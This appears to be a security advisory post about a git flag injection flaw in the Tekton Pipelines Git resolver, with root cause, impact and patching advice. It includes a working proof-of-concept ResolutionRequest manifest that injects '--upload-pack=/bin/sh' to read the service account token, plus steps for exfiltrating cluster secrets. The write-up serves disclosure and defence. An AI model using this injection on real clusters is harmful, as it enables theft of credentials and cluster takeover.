Tekton Pipelines, Git Resolver Flag Injection, CVE-N/A (High)

Listen to this Post

The vulnerability arises from two root causes. First, the `revision` parameter in a `ResolutionRequest` is passed directly as a positional argument to `git fetch` without validation that it does not start with a `-` character. Git parses flags even from positional arguments, so a value like `–upload-pack=/bin/sh` is interpreted as a flag, not a refspec. Second, the `validateRepoURL` function explicitly allows URLs beginning with /, which are local filesystem paths. When `git fetch` uses a local path as the remote, the `–upload-pack` flag causes Git to execute the specified binary locally on the resolver pod. An attacker who can submit `ResolutionRequest` objects combines these: they set `url` to a local path (e.g., /tmp/localrepo) and `revision` to --upload-pack=/bin/sh. The resolver executes git fetch origin --upload-pack=/bin/sh --depth=1, launching `/bin/sh` with the repository path as argument. From there, the attacker can read cluster secrets because the `tekton-pipelines-resolvers` ServiceAccount has cluster-wide `get/list/watch` on all Secrets. The deprecated and current resolvers share the vulnerable code. No shell metacharacters are needed; Git itself does the injection. Attack complexity is high because a valid Git repo must exist at a predictable path on the pod, but concurrent resolutions or default configurations can enable it. Proof-of-concept uses `kubectl create` with a crafted ResolutionRequest. The fix requires validating that `revision` does not begin with `-` and optionally removing local-path URL support.

dailycve form:

Platform: Tekton Pipelines
Version: All versions
Vulnerability: Git flag injection
Severity: High
date: 2024-04-10

Prediction: Patch within 30d

What Undercode Say:

Identify vulnerable resolver pods
kubectl get pods -n tekton-pipelines -l app=tekton-pipelines-resolvers
Check for missing revision validation in source
grep -rn 'revision.fetch' pkg/resolution/resolver/git/
Exploit simulation (requires local repo on pod)
kubectl create -f - <<EOF
apiVersion: resolution.tekton.dev/v1beta1
kind: ResolutionRequest
metadata:
name: test-injection
spec:
params:
- name: url
value: /tmp/existing-repo
- name: revision
value: "--upload-pack=/bin/sh -c 'cat /var/run/secrets/kubernetes.io/serviceaccount/token'"
EOF

Exploit:

– Attacker submits `ResolutionRequest` with `url=/tmp/predictable-repo` and revision=--upload-pack=/bin/sh.
– Resolver runs git fetch origin --upload-pack=/bin/sh --depth=1, executing `/bin/sh` with repo path.
– Shell can read service account token, then use Kubernetes API to list all secrets cluster-wide.
– Exfiltrate via `curl` from injected --upload-pack=/usr/bin/curl.

Protection from this CVE:

  • Apply fix: validate `revision` with `strings.HasPrefix(revision, “-“)` -> reject.
  • Remove local path support: change `validateRepoURL` regex to deny ^/.
  • Upgrade to patched Tekton version (when available).
  • Restrict `ResolutionRequest` submission to trusted tenants via RBAC.
  • Run resolver pods with read-only root filesystem and drop all capabilities.

Impact:

  • Full cluster secret exfiltration (kubeconfigs, cloud tokens, API keys).
  • Lateral movement to cloud infrastructure and other namespaces.
  • Privilege escalation from tenant to cluster admin.
  • Both old and new resolvers vulnerable; default installations affected.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top